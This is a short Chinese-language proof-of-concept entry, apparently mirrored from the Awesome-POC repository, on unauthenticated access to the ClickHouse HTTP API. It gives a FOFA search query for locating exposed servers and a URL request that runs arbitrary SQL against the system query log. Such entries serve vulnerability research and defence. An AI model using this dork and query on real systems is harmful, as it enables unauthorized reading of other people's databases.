mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
675 B
675 B
ClickHouse API 数据库接口未授权访问漏洞
漏洞描述
ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据
漏洞影响
ClickHouse
FOFA
"ClickHouse" && body="ok"
漏洞复现
登录页面
执行SQL语句
/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
